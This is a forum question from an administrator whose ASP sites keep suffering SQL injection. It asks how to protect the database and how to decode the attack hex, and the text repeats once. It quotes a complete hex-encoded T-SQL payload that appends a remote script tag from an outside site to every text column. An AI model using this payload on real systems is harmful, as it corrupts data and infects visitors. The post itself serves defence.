paemond
asked on
SQL Injection #2
Hi,
We're still being attacked via SQL Injection. I leave the database that's been targeted most of the time, in single user mode, during off hours. At least that way I don't wake up to find all my tables corrupted or worse, gone altogether.
We're bringing in a security expert to take a look at our sites. We know that the .asp pages have to be fixed and have a pretty good idea of how, but we're a very small shop and until then I'm going to have to deal with this on the database side. I'm doing backups of the database that's been hit the most, every 30 minutes,and I've added some auditing columns and triggers on all the tables so I can see when it happens.
#1) Is there anything else I can do on the database side to protect myself?
#2) Is there anything around that I can use to translate the hexcodes that are being used? For example:
DECLARE%20@S%20NVARCHAR(40 00);SET%20 @S=CAST(0x 4400450043 004C004100 5200450020 0040005400 2000760061 0072006300 6800610072 0028003200 3500350029 002C004000 4300200076 0061007200 6300680061 0072002800 3200350035 0029002000 4400450043 004C004100 5200450020 0054006100 62006C0065 005F004300 7500720073 006F007200 2000430055 0052005300 4F00520020 0046004F00 5200200073 0065006C00 6500630074 0020006100 2E006E0061 006D006500 2C0062002E 006E006100 6D00650020 0066007200 6F006D0020 0073007900 73006F0062 006A006500 6300740073 0020006100 2C00730079 0073006300 6F006C0075 006D006E00 7300200062 0020007700 6800650072 0065002000 61002E0069 0064003D00 62002E0069 0064002000 61006E0064 0020006100 2E00780074 0079007000 65003D0027 0075002700 200061006E 0064002000 280062002E 0078007400 7900700065 003D003900 390020006F 0072002000 62002E0078 0074007900 700065003D 0033003500 20006F0072 0020006200 2E00780074 0079007000 65003D0032 0033003100 20006F0072 0020006200 2E00780074 0079007000 65003D0031 0036003700 290020004F 0050004500 4E00200054 0061006200 6C0065005F 0043007500 720073006F 0072002000 4600450054 0043004800 20004E0045 0058005400 2000460052 004F004D00 2000200054 0061006200 6C0065005F 0043007500 720073006F 0072002000 49004E0054 004F002000 400054002C 0040004300 2000570048 0049004C00 4500280040 0040004600 4500540043 0048005F00 5300540041 0054005500 53003D0030 0029002000 4200450047 0049004E00 2000650078 0065006300 2800270075 0070006400 6100740065 0020005B00 27002B0040 0054002B00 27005D0020 0073006500 740020005B 0027002B00 400043002B 0027005D00 3D00720074 0072006900 6D00280063 006F006E00 7600650072 0074002800 7600610072 0063006800 610072002C 005B002700 2B00400043 002B002700 5D00290029 002B002700 27003C0073 0063007200 6900700074 0020007300 720063003D 0068007400 740070003A 002F002F00 7700770077 002E006E00 6900680061 006F003100 310032002E 0063006F00 6D002F006D 002E006A00 73003E003C 002F007300 6300720069 0070007400 3E00270027 0027002900 4600450054 0043004800 20004E0045 0058005400 2000460052 004F004D00 2000200054 0061006200 6C0065005F 0043007500 720073006F 0072002000 49004E0054 004F002000 400054002C 0040004300 200045004E 0044002000 43004C004F 0053004500 2000540061 0062006C00 65005F0043 0075007200 73006F0072 0020004400 450041004C 004C004F00 4300410054 0045002000 5400610062 006C006500 5F00430075 0072007300 6F007200
Thanks
We're still being attacked via SQL Injection. I leave the database that's been targeted most of the time, in single user mode, during off hours. At least that way I don't wake up to find all my tables corrupted or worse, gone altogether.
We're bringing in a security expert to take a look at our sites. We know that the .asp pages have to be fixed and have a pretty good idea of how, but we're a very small shop and until then I'm going to have to deal with this on the database side. I'm doing backups of the database that's been hit the most, every 30 minutes,and I've added some auditing columns and triggers on all the tables so I can see when it happens.
#1) Is there anything else I can do on the database side to protect myself?
#2) Is there anything around that I can use to translate the hexcodes that are being used? For example:
DECLARE%20@S%20NVARCHAR(40
Thanks
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER